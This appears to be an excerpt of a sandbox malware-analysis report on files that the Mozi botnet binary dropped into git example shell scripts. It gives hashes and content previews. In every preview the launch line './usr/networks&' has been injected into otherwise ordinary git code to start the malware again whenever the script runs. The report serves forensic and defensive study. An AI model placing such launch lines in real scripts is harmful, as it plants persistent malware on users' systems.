                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:OS/2 REXX batch file, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):21942
                                                                                                        Entropy (8bit):5.106661772210516
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                        MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                        SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                        SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                        SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                        /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4825
                                                                                                        Entropy (8bit):5.113528532566079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                        MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                        SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                        SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                        SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                        /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11759
                                                                                                        Entropy (8bit):5.2205279036587235
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                        MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                        SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                        SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                        SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                        /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13843
                                                                                                        Entropy (8bit):5.402105827507175
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                        MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                        SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                        SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                        SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                        /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5954
                                                                                                        Entropy (8bit):5.053117199381536
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                        MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                        SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                        SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                        SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                        /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.0161977906092705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                        MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                        SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                        SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                        SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):234
                                                                                                        Entropy (8bit):4.9965164312586925
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                        MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                        SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                        SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                        SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2436
                                                                                                        Entropy (8bit):5.153713997451705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                        MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                        SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                        SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                        SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                        /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):247
                                                                                                        Entropy (8bit):4.532049748049262
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                        MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                        SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                        SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                        SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12742
                                                                                                        Entropy (8bit):5.053935136942481
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                        MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                        SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                        SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                        SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                        /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4349
                                                                                                        Entropy (8bit):4.9994650554848405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                        MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                        SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                        SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                        SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                        /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2499
                                                                                                        Entropy (8bit):5.168731776130111
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                        MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                        SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                        SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                        SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                        /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1947
                                                                                                        Entropy (8bit):5.193786239756587
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                        MD5:F1EDF5EE98492845561257661376A072
                                                                                                        SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                        SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                        SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                        /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2433
                                                                                                        Entropy (8bit):5.07831529192731
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                        MD5:71B42464943116BC0925788790C82720
                                                                                                        SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                        SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                        SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                        /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4385
                                                                                                        Entropy (8bit):5.300590299626365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                        MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                        SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                        SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                        SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                        /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1972
                                                                                                        Entropy (8bit):5.222096129300364
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                        MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                        SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                        SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
